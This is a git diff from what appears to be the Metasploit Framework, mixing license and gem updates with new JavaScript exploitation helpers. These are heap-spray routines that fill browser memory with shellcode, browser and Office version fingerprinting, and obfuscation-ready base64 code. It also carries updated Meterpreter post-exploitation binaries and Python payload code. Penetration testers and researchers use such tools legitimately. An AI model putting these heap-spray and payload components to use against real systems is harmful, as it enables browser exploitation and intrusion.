diff --git a/.mailmap b/.mailmap index 4a85ec1c7b..7b9839f967 100644 --- a/.mailmap +++ b/.mailmap @@ -7,6 +7,7 @@ hmoore-r7 HD Moore jlee-r7 egypt # aka egypt jlee-r7 James Lee # aka egypt jlee-r7 James Lee +joev-r7 joev joev-r7 Joe Vennix jvazquez-r7 jvazquez-r7 limhoff-r7 Luke Imhoff diff --git a/.rspec b/.rspec index 16f9cdb013..0d8a01e567 100644 --- a/.rspec +++ b/.rspec @@ -1,2 +1,2 @@ --color ---format documentation +--format Fivemat diff --git a/Gemfile b/Gemfile index ec35b2f614..0f0282ae07 100755 --- a/Gemfile +++ b/Gemfile @@ -40,6 +40,8 @@ group :development, :test do # Version 4.1.0 or newer is needed to support generate calls without the # 'FactoryGirl.' in factory definitions syntax. gem 'factory_girl', '>= 4.1.0' +# Make rspec output shorter and more useful + gem 'fivemat', '1.2.1' # running documentation generation tasks and rspec tasks gem 'rake', '>= 10.0.0' end diff --git a/Gemfile.lock b/Gemfile.lock index 23b8ceecfe..d7b1bd88e7 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -18,6 +18,7 @@ GEM diff-lcs (1.2.4) factory_girl (4.2.0) activesupport (>= 3.0.0) + fivemat (1.2.1) i18n (0.6.5) json (1.8.0) metasploit_data_models (0.16.6) @@ -62,6 +63,7 @@ DEPENDENCIES activesupport (>= 3.0.0) database_cleaner factory_girl (>= 4.1.0) + fivemat (= 1.2.1) json metasploit_data_models (~> 0.16.6) msgpack diff --git a/LICENSE b/LICENSE index 237eff3bac..acb2f21eca 100644 --- a/LICENSE +++ b/LICENSE @@ -12,7 +12,7 @@ License: BSD-3-clause # # This license does not apply to third-party components detailed below. # -# Last updated: 2013-Mar-25 +# Last updated: 2013-Nov-04 # Files: data/john/* @@ -166,230 +166,6 @@ Files: lib/fastlib.rb Copyright: 2011, Rapid7 Inc. License: Ruby -Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/* -Copyright: 2006-2007, Francis Cianfrocca -License: Ruby - -Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/* -Copyright: Daniel Luz -License: Ruby - -Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/* -Copyright: Austin Ziegler -License: Ruby - -Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/* -Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada -License: MIT - -Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/* -Copyright: 1997-2012 by the authors -License: Ruby - -Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/* -Copyright: Marc-Andre Cournoyer -License: Ruby - -Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/* -Copyright: 2003-2011, Daniel J. Berger -License: Artistic - -Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/* -Copyright: 2003-2011, Daniel J. Berger -License: Artistic - -Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/* -Copyright: 2007-2012, Daniel J. Berger -License: Artistic - -Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/* -Copyright: 2006-2010, Daniel J. Berger -License: Artistic - -Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/* -Copyright: 2006-2011, murphy (Kornelius Kalnback) -License: LGPL-2.1 - -Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/* -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/* -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/* -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/* -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/* -Copyright: 2006-2011 David Heinemeier Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/* -Copyright: 2005-2011 David Heinemeier Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/* -Copyright: 2007 David Heinemeir Hansson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/arel-*/* -Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/* -Copyright: 2011 Ben Johnson of Binary Logic -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/builder-*/* -Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com) -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/* -Copyright: 2008-2012 Jonas Nicklas -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/* -Copyright: 2010 Willem van Bergen -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/* -Copyright: Rob Aldred -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/* -Copyright: 2005-2012 Thomas Uehlinger -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/* -Copyright: 2004-2011 Austin Ziegler -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/* -Copyright: 2006-2011 kuwata-lab.com all rights reserved -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/* -Copyright: 2008-2010 -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/* -Copyright: 2011 Travis Tilley -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/hike-*/* -Copyright: 2011 Sam Stephenson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/* -Copyright: 2008 The Ruby I18n team -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/* -Copyright: 2010-2012 John Crepezzi -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/journey-*/* -Copyright: 2011 Aaron Patternson -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/* -Copyright: 2010 Andre Arko -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/* -Copyright: 2005, 2006 Tobias Luetke -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/mail-*/* -Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/* -Copyright: 2012 Rapid7, Inc. -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/* -Copyright: 2011 John Mair (banisterfiend) -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/* -Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/* -Copyright: 2007 Clifford Heath -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/* -Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper) -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/rack-*/* -Copyright: 2007-2010 Christian Neukirchen -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/* -Copyright: 2008 Ryan Tomayko -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/* -Copyright: 2010 Joshua Peek -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/* -Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc. -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/railties-*/* -Copyright: No copyright statement provided -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/rake-*/* -Copyright: 2003, 2004 Jim Weirich -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/robots-*/* -Copyright: 2008 Kyle Maxwell, contributors -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/slop-*/* -Copyright: 2012 Lee Jarvis -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/spork-*/* -Copyright: 2009 Tim Harper -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/* -Copyright: 2011 Sam Stephenson, Joshua Peek -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/* -Copyright: 2006-2012 Aaron Pfeifer -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/thor-*/* -Copyright: 2008 Yehuda Katz -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/* -Copyright: 2010 Ryan Tomayko -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/* -Copyright: 2007 Nathan Sobo -License: MIT - -Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/* -Copyright: 2005-2006 Philip Ross -License: MIT - Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* Copyright: 2006-2010 Yoann GUILLOT License: LGPL-2.1 @@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb Copyright: 2009-2010 Berend-Jan "SkyLined" Wever License: BSD-3-clause +# +# Gems +# + +Files: activemodel +Copyright: 2004-2011 David Heinemeier Hansson +License: MIT + +Files: activerecord +Copyright: 2004-2011 David Heinemeier Hansson +License: MIT + +Files: activesupport +Copyright: 2005-2011 David Heinemeier Hansson +License: MIT + +Files: arel +Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson +License: MIT + +Files: builder +Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com) +License: MIT + +Files: database_cleaner +Copyright: 2009 Ben Mabey +License: MIT + +Files: diff-lcs +Copyright: 2004-2011 Austin Ziegler +License: MIT + +Files: factory_girl +Copyright: 2008-2013 Joe Ferris and thoughtbot, inc. +License: MIT + +Files: fivemat +Copyright: 2012 Tim Pope +License: MIT + +Files: i18n +Copyright: 2008 The Ruby I18n team +License: MIT + +Files: json +Copyright: Daniel Luz +License: Ruby + +Files: metasploit_data_models +Copyright: 2012 Rapid7, Inc. +License: MIT + +Files: mini_portile +Copyright: 2011 Luis Lavena +License: MIT + +Files: msgpack +Copyright: Austin Ziegler +License: Ruby + +Files: multi_json +Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. +License: MIT + +Files: network_interface +Copyright: 2012, Rapid7, Inc. +License: MIT + +Files: nokogiri +Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada +License: MIT + +Files: packetfu +Copyright: 2008-2012 Tod Beardsley +License: BSD-3-clause + +Files: pcaprub +Copyright: 2007-2008, Alastair Houghton +License: LGPL-2.1 + +Files: pg +Copyright: 1997-2012 by the authors +License: Ruby + +Files: rake +Copyright: 2003, 2004 Jim Weirich +License: MIT + +Files: redcarpet +Copyright: 2009 Natacha Porté +License: MIT + +Files: robots +Copyright: 2008 Kyle Maxwell, contributors +License: MIT + +Files: rspec +Copyright: 2009 Chad Humphries, David Chelimsky +License: MIT + +Files: shoulda-matchers +Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc. +License: MIT + +Files: simplecov +Copyright: 2010-2012 Christoph Olszowka +License: MIT + +Files: timecop +Copyright: 2012 Travis Jeffery, John Trupiano +License: MIT + +Files: tzinfo +Copyright: 2005-2006 Philip Ross +License: MIT + +Files: yard +Copyright: 2007-2013 Loren Segal +License: MIT + + License: BSD-2-clause Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: diff --git a/data/js/detect/addons.js b/data/js/detect/addons.js new file mode 100644 index 0000000000..277c1fd469 --- /dev/null +++ b/data/js/detect/addons.js @@ -0,0 +1,51 @@ +window.addons_detect = { }; + +/** + * Returns the version of Microsoft Office. If not found, returns null. + **/ +window.addons_detect.getMsOfficeVersion = function () { + var version; + var types = new Array(); + for (var i=1; i <= 5; i++) { + try { + types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString())); + } + catch (e) { + types[i-1] = null; + } + } + + if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' && + types[3] == 'object' && types[4] == 'object') + { + version = "2012"; + } + else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' && + types[3] == 'object' && types[4] == null) + { + version = "2010"; + } + else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' && + types[3] == null && types[4] == null) + { + version = "2007"; + } + else if (types[0] == 'object' && types[1] == 'object' && types[2] == null && + types[3] == null && types[4] == null) + { + version = "2003"; + } + else if (types[0] == 'object' && types[1] == null && types[2] == null && + types[3] == null && types[4] == null) + { + // If run for the first time, you must manullay allow the "Microsoft Office XP" + // add-on to run. However, this prompt won't show because the ActiveXObject statement + // is wrapped in an exception handler. + version = "xp"; + } + else { + version = null; + } + + return version; +} \ No newline at end of file diff --git a/lib/rex/exploitation/javascriptosdetect.js b/data/js/detect/os.js similarity index 98% rename from lib/rex/exploitation/javascriptosdetect.js rename to data/js/detect/os.js index eabe23c33a..1fdd2deb1f 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/data/js/detect/os.js @@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){ return d.style[propCamelCase] === css; } + var input_type_is_valid = function(input_type) { + if (!document.createElement) return false; + var input = document.createElement('input'); + input.setAttribute('type', input_type); + return input.type == input_type; + } + //-- // Client //-- @@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){ // Thanks to developer.mozilla.org "Firefox for developers" series for most // of these. // Release changelogs: http://www.mozilla.org/en-US/firefox/releases/ - if ('HTMLTimeElement' in window) { - ua_version = '22.0' + if (css_is_valid('background-attachment', + 'backgroundAttachment', + 'local')) { + ua_version = '25.0'; + } else if ('DeviceStorage' in window && window.DeviceStorage && + 'default' in window.DeviceStorage.prototype) { + // https://bugzilla.mozilla.org/show_bug.cgi?id=874213 + ua_version = '24.0'; + } else if (input_type_is_valid('range')) { + ua_version = '23.0'; + } else if ('HTMLTimeElement' in window) { + ua_version = '22.0'; } else if ('createElement' in document && document.createElement('main') && document.createElement('main').constructor === window['HTMLElement']) { - ua_version = '21.0' + ua_version = '21.0'; } else if ('imul' in Math) { - ua_version = '20.0' + ua_version = '20.0'; } else if (css_is_valid('font-size', 'fontSize', '23vmax')) { - ua_version = '19.0' + ua_version = '19.0'; } else if ('devicePixelRatio' in window) { - ua_version = '18.0' + ua_version = '18.0'; } else if ('createElement' in document && document.createElement('iframe') && 'sandbox' in document.createElement('iframe')) { - ua_version = '17.0' + ua_version = '17.0'; } else if ('mozApps' in navigator && 'install' in navigator.mozApps) { - ua_version = '16.0' + ua_version = '16.0'; } else if ('HTMLSourceElement' in window && HTMLSourceElement.prototype && 'media' in HTMLSourceElement.prototype) { - ua_version = '15.0' + ua_version = '15.0'; } else if ('mozRequestPointerLock' in document.body) { - ua_version = '14.0' + ua_version = '14.0'; } else if ('Map' in window) { - ua_version = "13.0" + ua_version = "13.0"; } else if ('mozConnection' in navigator) { ua_version = "12.0"; } else if ('mozVibrate' in navigator) { diff --git a/data/js/memory/heap_spray.js b/data/js/memory/heap_spray.js new file mode 100644 index 0000000000..ca174aca80 --- /dev/null +++ b/data/js/memory/heap_spray.js @@ -0,0 +1,17 @@ +var memory = new Array(); +function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { + var index; + var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); + var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); + while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } + while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } + + var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); + while (retSlide.length < heapBlockSize) { retSlide += retSlide; } + retSlide = retSlide.substring(0, heapBlockSize - shellcode.length); + + var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; + for (index = 0; index < heapBlockCnt; index++) { + memory[index] = retSlide + shellcode; + } +} \ No newline at end of file diff --git a/data/js/memory/mstime_malloc.js b/data/js/memory/mstime_malloc.js new file mode 100644 index 0000000000..d931db004f --- /dev/null +++ b/data/js/memory/mstime_malloc.js @@ -0,0 +1,31 @@ +function mstime_malloc(oArg) { + var shellcode = oArg.shellcode; + var offset = oArg.offset; + var heapBlockSize = oArg.heapBlockSize; + var objId = oArg.objId; + + if (shellcode == undefined) { throw "Missing argument: shellcode"; } + if (offset == undefined) { offset = 0; } + if (heapBlockSize == undefined) { throw "Size must be defined"; } + + var buf = ""; + for (var i=0; i < heapBlockSize/4; i++) { + if (i == offset) { + if (i == 0) { buf += shellcode; } + else { buf += ";" + shellcode; } + } + else { + buf += ";#W00TA"; + } + } + + var e = document.getElementById(objId); + if (e == null) { + var eleId = "W00TB" + var acTag = "" + document.body.innerHTML = document.body.innerHTML + acTag; + e = document.getElementById(eleId); + } + try { e.values = buf; } + catch (e) {} +} \ No newline at end of file diff --git a/data/js/memory/property_spray.js b/data/js/memory/property_spray.js new file mode 100644 index 0000000000..f922e60196 --- /dev/null +++ b/data/js/memory/property_spray.js @@ -0,0 +1,38 @@ +var sym_div_container; +function sprayHeap( oArg ) { + var shellcode = oArg.shellcode; + var offset = oArg.offset; + var heapBlockSize = oArg.heapBlockSize; + var maxAllocs = oArg.maxAllocs; + var objId = oArg.objId; + + if (shellcode == undefined) { throw "Missing argument: shellcode"; } + if (offset == undefined) { offset = 0x00; } + if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } + if (maxAllocs == undefined) { maxAllocs = 0x350; } + + if (offset > 0x800) { throw "Bad alignment"; } + + sym_div_container = document.getElementById(objId); + + if (sym_div_container == null) { + sym_div_container = document.createElement("div"); + } + + sym_div_container.style.cssText = "display:none"; + var data; + junk = unescape("%u2020%u2020"); + while (junk.length < offset+0x1000) junk += junk; + + data = junk.substring(0,offset) + shellcode; + data += junk.substring(0,0x800-offset-shellcode.length); + + while (data.length < heapBlockSize) data += data; + + for (var i = 0; i < maxAllocs; i++) + { + var obj = document.createElement("button"); + obj.title = data.substring(0, (heapBlockSize-2)/2); + sym_div_container.appendChild(obj); + } +} \ No newline at end of file diff --git a/data/js/network/ajax_download.js b/data/js/network/ajax_download.js new file mode 100644 index 0000000000..560d3d22ae --- /dev/null +++ b/data/js/network/ajax_download.js @@ -0,0 +1,27 @@ +function ajax_download(oArg) { + var method = oArg.method; + var path = oArg.path; + var data = oArg.data; + + if (method == undefined) { method = "GET"; } + if (method == path) { throw "Missing parameter 'path'"; } + if (data == undefined) { data = null; } + + if (window.XMLHttpRequest) { + xmlHttp = new XMLHttpRequest(); + } + else { + xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); + } + + if (xmlHttp.overrideMimeType) { + xmlHttp.overrideMimeType("text/plain; charset=x-user-defined"); + } + + xmlHttp.open(method, path, false); + xmlHttp.send(data); + if (xmlHttp.readyState == 4 && xmlHttp.status == 200) { + return xmlHttp.responseText; + } + return null; +} \ No newline at end of file diff --git a/data/js/utils/base64.js b/data/js/utils/base64.js new file mode 100644 index 0000000000..3cb1dfa4cb --- /dev/null +++ b/data/js/utils/base64.js @@ -0,0 +1,126 @@ +// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html +// variable names changed to make obfuscation easier +var Base64 = { + // private property + _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", + + // private method + _utf8_encode : function ( input ){ + input = input.replace(/\r\n/g,"\\n"); + var utftext = ""; + var input_idx; + + for (input_idx = 0; input_idx < input.length; input_idx++) { + var chr = input.charCodeAt(input_idx); + if (chr < 128) { + utftext += String.fromCharCode(chr); + } + else if((chr > 127) && (chr < 2048)) { + utftext += String.fromCharCode((chr >> 6) | 192); + utftext += String.fromCharCode((chr & 63) | 128); + } else { + utftext += String.fromCharCode((chr >> 12) | 224); + utftext += String.fromCharCode(((chr >> 6) & 63) | 128); + utftext += String.fromCharCode((chr & 63) | 128); + } + } + + return utftext; + }, + + // public method for encoding + encode : function( input ) { + var output = ""; + var chr1, chr2, chr3, enc1, enc2, enc3, enc4; + var input_idx = 0; + + input = Base64._utf8_encode(input); + + while (input_idx < input.length) { + chr1 = input.charCodeAt( input_idx++ ); + chr2 = input.charCodeAt( input_idx++ ); + chr3 = input.charCodeAt( input_idx++ ); + + enc1 = chr1 >> 2; + enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); + enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); + enc4 = chr3 & 63; + + if (isNaN(chr2)) { + enc3 = enc4 = 64; + } else if (isNaN(chr3)) { + enc4 = 64; + } + output = output + + this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) + + this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4); + } + return output; + }, + // public method for decoding + decode : function (input) { + var output = ""; + var chr1, chr2, chr3; + var enc1, enc2, enc3, enc4; + var i = 0; + + input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, ""); + + while (i < input.length) { + + enc1 = this._keyStr.indexOf(input.charAt(i++)); + enc2 = this._keyStr.indexOf(input.charAt(i++)); + enc3 = this._keyStr.indexOf(input.charAt(i++)); + enc4 = this._keyStr.indexOf(input.charAt(i++)); + + chr1 = (enc1 << 2) | (enc2 >> 4); + chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); + chr3 = ((enc3 & 3) << 6) | enc4; + + output = output + String.fromCharCode(chr1); + + if (enc3 != 64) { + output = output + String.fromCharCode(chr2); + } + if (enc4 != 64) { + output = output + String.fromCharCode(chr3); + } + + } + + output = Base64._utf8_decode(output); + + return output; + + }, + _utf8_decode : function (utftext) { + var string = ""; + var input_idx = 0; + var chr1 = 0; + var chr2 = 0; + var chr3 = 0; + + while ( input_idx < utftext.length ) { + + chr1 = utftext.charCodeAt(input_idx); + + if (chr1 < 128) { + string += String.fromCharCode(chr1); + input_idx++; + } + else if((chr1 > 191) && (chr1 < 224)) { + chr2 = utftext.charCodeAt(input_idx+1); + string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63)); + input_idx += 2; + } else { + chr2 = utftext.charCodeAt(input_idx+1); + chr3 = utftext.charCodeAt(input_idx+2); + string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63)); + input_idx += 3; + } + } + + return string; + } + +}; \ No newline at end of file diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib new file mode 100755 index 0000000000..75b5eb755b Binary files /dev/null and b/data/meterpreter/common.lib differ diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index b8ccc6f20f..5ef9208191 100755 Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index 6bf61b60da..ca6d1b87d8 100755 Binary files a/data/meterpreter/elevator.x86.dll and b/data/meterpreter/elevator.x86.dll differ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index 07e648b7af..a25bcc536e 100755 Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 1355e55082..0d65719c82 100755 Binary files a/data/meterpreter/ext_server_espia.x86.dll and b/data/meterpreter/ext_server_espia.x86.dll differ diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index 0262601a99..3b2bb9c385 100755 Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index 830a83fb8c..cd53e18682 100755 Binary files a/data/meterpreter/ext_server_incognito.x86.dll and b/data/meterpreter/ext_server_incognito.x86.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index a14a65b369..c73e5d1fa2 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index bb178b592e..1b4be1f050 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and b/data/meterpreter/ext_server_lanattacks.x86.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index a62edf68dc..6a11445e30 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and b/data/meterpreter/ext_server_mimikatz.x64.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index bca5cc3611..244113e20a 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and b/data/meterpreter/ext_server_mimikatz.x86.dll differ diff --git a/data/meterpreter/ext_server_networkpug.lso b/data/meterpreter/ext_server_networkpug.lso index 4d0eea9cbe..dd133a03b2 100755 Binary files a/data/meterpreter/ext_server_networkpug.lso and b/data/meterpreter/ext_server_networkpug.lso differ diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 2f10f3d45c..7402d1c2b5 100755 Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index bb31216859..192d1a1f14 100755 Binary files a/data/meterpreter/ext_server_priv.x86.dll and b/data/meterpreter/ext_server_priv.x86.dll differ diff --git a/data/meterpreter/ext_server_sniffer.lso b/data/meterpreter/ext_server_sniffer.lso index bd6e0e4392..cc372cada0 100755 Binary files a/data/meterpreter/ext_server_sniffer.lso and b/data/meterpreter/ext_server_sniffer.lso differ diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll index 87f05c0df6..0e552fbc18 100755 Binary files a/data/meterpreter/ext_server_sniffer.x64.dll and b/data/meterpreter/ext_server_sniffer.x64.dll differ diff --git a/data/meterpreter/ext_server_sniffer.x86.dll b/data/meterpreter/ext_server_sniffer.x86.dll index 2a99ab0b0f..1ec48f7317 100755 Binary files a/data/meterpreter/ext_server_sniffer.x86.dll and b/data/meterpreter/ext_server_sniffer.x86.dll differ diff --git a/data/meterpreter/ext_server_stdapi.lso b/data/meterpreter/ext_server_stdapi.lso index f4b0096b1b..a4a50425f5 100755 Binary files a/data/meterpreter/ext_server_stdapi.lso and b/data/meterpreter/ext_server_stdapi.lso differ diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 98b1c235d0..b64b7278e4 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433 TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440 TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441 TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442 +TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443 +TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444 # Socket TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 @@ -273,6 +275,9 @@ ERROR_FAILURE = 1 # errors. ERROR_CONNECTION_ERROR = 10000 +WIN_AF_INET = 2 +WIN_AF_INET6 = 23 + def get_stat_buffer(path): si = os.stat(path) rdev = 0 @@ -290,6 +295,27 @@ def get_stat_buffer(path): st_buf += struct.pack('II', pkt[offset:offset+8]) + if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): + val = pkt[offset+8:(offset+8+(tlv[0] - 8))] + if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + val = val.split('\x00', 1)[0] + elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + val = struct.unpack('>I', val)[0] + elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: + val = bool(struct.unpack('b', val)[0]) + elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + pass + yield {'type':tlv[1], 'length':tlv[0], 'value':val} + offset += tlv[0] + raise StopIteration() + def tlv_pack(*args): if len(args) == 2: tlv = {'type':args[0], 'value':args[1]} @@ -271,7 +289,7 @@ class PythonMeterpreter(object): if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE preloadlib_methods = self.extension_functions.keys() - i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess}) + i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess}) i.runcode(compile(data_tlv['value'], '', 'exec')) postloadlib_methods = self.extension_functions.keys() new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index e94b10adb6..1d2e6aab06 100755 Binary files 